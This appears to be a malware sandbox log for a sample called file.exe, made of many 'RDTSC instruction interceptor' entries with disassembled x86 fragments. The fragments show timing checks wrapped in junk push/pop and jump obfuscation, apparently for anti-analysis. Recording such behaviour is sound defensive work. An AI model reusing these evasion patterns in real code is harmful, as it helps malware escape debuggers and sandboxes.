Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C407C4 second address: C407E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE048D058A5h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44FAF second address: C44FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0491DA117h 0x00000009 jmp 00007FE0491DA10Ah 0x0000000e popad 0x0000000f pop edi 0x00000010 push esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0F312 second address: C0F320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE048D0589Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0F320 second address: C0F324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0F87D second address: C0F881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0F881 second address: C0F887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0F887 second address: C0F88C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0F96A second address: C0F970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0F970 second address: C0F975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0FA02 second address: C0FA06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0FAA5 second address: C0FAAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10211 second address: C1021F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE0491DA106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1021F second address: C10223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C104CB second address: C104D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C104D2 second address: C10512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jp 00007FE048D0589Bh 0x0000000e mov edx, 39E722EAh 0x00000013 lea eax, dword ptr [ebp+12483F85h] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FE048D05898h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 xor dword ptr [ebp+122D242Ch], eax 0x00000039 push eax 0x0000003a pushad 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C10512 second address: BFA529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FE0491DA116h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FE0491DA108h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov di, ax 0x0000002d call 00007FE0491DA10Fh 0x00000032 js 00007FE0491DA10Bh 0x00000038 sbb dx, 9EE0h 0x0000003d pop edx 0x0000003e lea eax, dword ptr [ebp+12483F41h] 0x00000044 mov di, bx 0x00000047 push eax 0x00000048 jp 00007FE0491DA10Eh 0x0000004e mov dword ptr [esp], eax 0x00000051 push 00000000h 0x00000053 push ebp 0x00000054 call 00007FE0491DA108h 0x00000059 pop ebp 0x0000005a mov dword ptr [esp+04h], ebp 0x0000005e add dword ptr [esp+04h], 00000014h 0x00000066 inc ebp 0x00000067 push ebp 0x00000068 ret 0x00000069 pop ebp 0x0000006a ret 0x0000006b mov ecx, dword ptr [ebp+122D2F65h] 0x00000071 call dword ptr [ebp+122D1D09h] 0x00000077 jmp 00007FE0491DA110h 0x0000007c push eax 0x0000007d push edx 0x0000007e jnp 00007FE0491DA108h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA529 second address: BFA544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FE048D05896h 0x0000000a jmp 00007FE048D058A1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA544 second address: BFA552 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FE0491DA106h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44120 second address: C44135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d js 00007FE048D0589Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4441C second address: C44426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE0491DA106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44426 second address: C44455 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007FE048D058A0h 0x0000000f jo 00007FE048D05896h 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007FE048D05896h 0x0000001e jns 00007FE048D05896h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C445C9 second address: C445CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44742 second address: C44746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44746 second address: C44750 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE0491DA106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44750 second address: C44764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE048D0589Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C44764 second address: C4477C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE0491DA106h 0x00000008 jnc 00007FE0491DA106h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FE0491DA106h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4489C second address: C448AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE048D0589Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD3A68 second address: BD3A7D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE0491DA10Eh 0x00000008 jnl 00007FE0491DA106h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD3A7D second address: BD3A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE048D05896h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A2C8 second address: C4A2CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A443 second address: C4A44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FE048D05896h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A44D second address: C4A471 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE0491DA110h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jnc 00007FE0491DA10Ah 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A77C second address: C4A7AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jmp 00007FE048D058A3h 0x0000000e jns 00007FE048D058A3h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A7AF second address: C4A7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0491DA118h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A7CB second address: C4A7CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4AD3A second address: C4AD44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE0491DA106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4B194 second address: C4B19E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE048D058ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4B19E second address: C4B1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE0491DA110h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e je 00007FE0491DA106h 0x00000014 jg 00007FE0491DA106h 0x0000001a pop ebx 0x0000001b pushad 0x0000001c jnc 00007FE0491DA106h 0x00000022 jc 00007FE0491DA106h 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4CB03 second address: C4CB08 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD6F9A second address: BD6F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD6F9E second address: BD6FBF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FE048D058A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FE048D05898h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD6FBF second address: BD6FC4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD6FC4 second address: BD6FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BD6FCF second address: BD6FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5488F second address: C548A7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE048D05896h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 je 00007FE048D058A2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C549FD second address: C54A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54A08 second address: C54A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54A0E second address: C54A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54A12 second address: C54A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54A18 second address: C54A22 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE0491DA119h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54B7A second address: C54B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54E5C second address: C54E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE0491DA116h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FE0491DA10Ah 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54E85 second address: C54E8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54E8A second address: C54E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FE0491DA106h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54E9B second address: C54EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C54FEB second address: C55008 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE0491DA106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FE0491DA113h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55185 second address: C551A3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE048D05896h 0x00000008 jne 00007FE048D05896h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FE048D05896h 0x00000018 jp 00007FE048D05896h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C551A3 second address: C551A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55477 second address: C55487 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE048D058A2h 0x00000008 jp 00007FE048D05896h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55487 second address: C55491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55491 second address: C55499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C55499 second address: C554A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C554A1 second address: C554B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE048D0589Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5561D second address: C55621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C545CB second address: C545E5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE048D05896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007FE048D05896h 0x00000014 ja 00007FE048D05896h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C595CB second address: C595D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C595D7 second address: C595DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C595DC second address: C59600 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE0491DA10Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FE0491DA10Bh 0x00000010 jbe 00007FE0491DA10Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C59600 second address: C5961F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FE048D058A7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5961F second address: C59623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5BDE7 second address: C5BDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE048D05896h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5BF94 second address: C5BF98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5C0FD second address: C5C11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE048D0589Ah 0x0000000e jmp 00007FE048D0589Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5EA1D second address: C5EA3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FE0491DA106h 0x00000009 pop eax 0x0000000a jng 00007FE0491DA11Ch 0x00000010 jmp 00007FE0491DA110h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5E6E0 second address: C5E6F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE048D058A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C65BBF second address: C65BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C65BCA second address: C65BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C65BCE second address: C65BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FE0491DA106h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0FE63 second address: C0FED3 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE048D05898h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FE048D058A3h 0x00000011 jmp 00007FE048D058A4h 0x00000016 popad 0x00000017 nop 0x00000018 sbb cx, 49E8h 0x0000001d push 00000004h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007FE048D05898h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 adc edx, 534D8049h 0x0000003f nop 0x00000040 pushad 0x00000041 jmp 00007FE048D0589Ah 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C64E1C second address: C64E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C64E22 second address: C64E26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68B56 second address: C68B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68B5A second address: C68B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68B5E second address: C68B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C685F9 second address: C68615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FE048D058A5h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C68615 second address: C68619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6BF0E second address: C6BF25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE048D05896h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007FE048D058BDh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6BF25 second address: C6BF41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE0491DA106h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE0491DA10Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C236 second address: C6C23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C23A second address: C6C242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C242 second address: C6C264 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE048D058ADh 0x00000008 jnp 00007FE048D05896h 0x0000000e jmp 00007FE048D058A1h 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C264 second address: C6C297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 jnc 00007FE0491DA112h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE0491DA117h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C580 second address: C6C584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C584 second address: C6C5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE0491DA115h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C6C5A8 second address: C6C5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
